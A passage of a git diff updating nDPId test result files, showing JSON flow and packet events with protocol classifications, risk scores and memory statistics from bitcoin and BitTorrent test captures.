{"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":637,"packets-processed":637,"total-skipped-flows":0,"total-l4-payload-len":539032,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":42,"global_ts_msec":1301329810839} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 637/637 @@ -48,9 +48,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5901424 bytes -~~ total memory freed........: 5901424 bytes -~~ total allocations/frees...: 118773/118773 +~~ total memory allocated....: 6035058 bytes +~~ total memory freed........: 6035058 bytes +~~ total allocations/frees...: 121535/121535 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1833 chars diff --git a/test/results/bittorrent.pcap.out b/test/results/bittorrent.pcap.out index cb509347d..e19d4d65b 100644 --- a/test/results/bittorrent.pcap.out +++ b/test/results/bittorrent.pcap.out @@ -2,62 +2,62 @@ 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1455469967246} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455469967246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967246,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4eD1AAEAGAADAqAEDUjrYc86YlaHFzANOp3OTAoAY\/\/\/swwAAAQEIChnb8BkAhEMxE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhgayboXmHFSZj4="} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 01344{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455469967465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":624,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":624,"pkt_l4_len":590,"thread_ts_msec":1455469967465,"pkt":"xCwDBkn+LFbcjDU0CABFAAJiKFpAAHUG7uJSOthzwKgBA5Whzpinc5NTxcwDkoAZ\/SDtQgAAAQEICgCEQ0UZ2\/AZNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTllMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI4ODhlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/9\/b\/v\/\/\/\/\/\/\/\/\/+\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/+\/3\/9\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/++\/\/\/\/\/\/\/\/\/3\/\/\/9\/\/\/\/f\/9\/\/\/\/\/9\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/7\/\/\/\/+AAAAABQQAAAJlAAAABQQAAALYAAAABQQAAAB+AAAABQQAAACJAAAABQQAAAE5AAAABQQAAAARAAAABQQAAAK+AAAABQQAAAMvAAAABQQAAAKkAAAABQQAAAGlAAAABQQAAADmAAAABQQAAAHxAAAABQQAAANdAAAABQQAAABXAAAABQQAAADTAAAABQQAAANxAAAABQQAAAJrAAAABQQAAACTAAAABQQAAAFjAAAABQQAAALoAAAABQQAAACGAAAABQQAAAG8AAAABQQAAAMMAAAABQQAAAGu"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455469967550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967550,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4KZJAAEAGAADAqAEDUjlhU86Xz5EMkOfxIylUooAY70J1ogAAAQEIChnb8UUAFHnUE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhJMcBHQL4ndrvA="} -00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455469967858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469967858,"pkt":"xCwDBkn+LFbcjDU0CABFAACkC49AAHcGgo1SOWFTwKgBA8+RzpcjKVSiDJDoNYAYAQJHBAAAAQEICgAUefwZ2\/FFE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wornNx4q0nl1XkqQAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTNlMQ=="} 01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455469968002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469968002,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDC5FAAHcGgOxSOWFTwKgBA8+RzpcjKVUSDJDoNYAZAQLSoQAAAQEICgAUef4Z2\/FFOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUzMTM3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg4N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/93\/\/\/\/\/\/\/\/\/\/\/+f\/\/\/\/\/7\/\/\/3\/\/\/\/\/\/\/\/v\/\/\/v\/+\/\/3\/\/\/\/\/9\/\/\/\/\/\/1\/\/\/f\/\/v9\/\/\/\/\/\/\/\/\/91\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAtIAAAAFBAAAAngAAAAFBAAAAeYAAAAFBAAAAUUAAAAFBAAAAskAAAAFBAAAAGcAAAAFBAAAArYAAAAFBAAAAVgAAAAFBAAAAQEAAAAFBAAAAjMAAAAFBAAAAqAAAAAFBAAAAMoAAAAFBAAAAxIAAAAFBAAAAlIAAAAFBAAAAc8AAAAFBAAAAkMAAAAFBAAAAagAAAAFBAAAAhsAAAAFBAAAAzgAAAAFBAAAAacAAAAFBAAAAxQAAAAFBAAAAw4AAAAFBAAAAVwAAAAFBAAAAqI="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455469969259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969259,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4K5tAAEAGAADAqAEDU9i48c6fyNXli2jySWt7B4AYK\/LO3wAAAQEIChnb9+x4G0bsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjvi3q9Fc8jVIrp0="} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455469969318,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1455469969318,"pkt":"xCwDBkn+LFbcjDU0CABFYACGozdAADIG1mVT2LjxwKgBA8jVzp9Ja3sH5YtpNoAYECl7XAAAAQEICngbRx8Z2\/fsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qniMLxLorRFP2hZAAAAEAFABkMTplaTBlNA=="} 01379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455469969391,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":648,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":648,"pkt_l4_len":614,"thread_ts_msec":1455469969391,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ6SOJAADIGLsdT2LjxwKgBA8jVzp9Ja3tZ5YtpNoAYECl87wAAAQEICngbR0YZ2\/gmOmlwdjQ0OlPYuPE0OmlwdjYxNjr+gAAAAAAAAOoGiP\/+zfQTMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk1MTQxM2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAxLjguODI6eXBpNTI4OTVlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/3\/\/\/\/\/7\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/b\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/9\/\/\/\/7\/\/\/\/\/\/\/99\/\/\/\/\/\/3\/\/97\/v\/\/\/\/\/9\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/X\/\/\/\/9\/\/+AAAAABQQAAAG6AAAABQQAAAITAAAABQQAAAHTAAAABQQAAAA1AAAABQQAAAAQAAAABQQAAAHdAAAABQQAAAMaAAAABQQAAAE+AAAABQQAAANHAAAABQQAAAN+AAAABQQAAAIEAAAABQQAAAHOAAAABQQAAAGSAAAABQQAAAC8AAAABQQAAANcAAAABQQAAAGMAAAABQQAAABAAAAABQQAAAFbAAAABQQAAAEBAAAABQQAAACdAAAABQQAAADUAAAABQQAAAC\/AAAABQQAAAKPAAAABQQAAANe"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4XbBAAEAGAADAqAEDTzXkAs6gOSOymifHI+P1WoAYmwf1TQAAAQEIChnb+J8AAH2QE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjqb8v2rPEXkzqd0="} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4duZAAEAGAADAqAEDeD4h8c6emaQxnKbPGdPY9oAYmwdcRQAAAQEIChnb+J8AQ+diE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsdMZTLXvd5m7DE="} 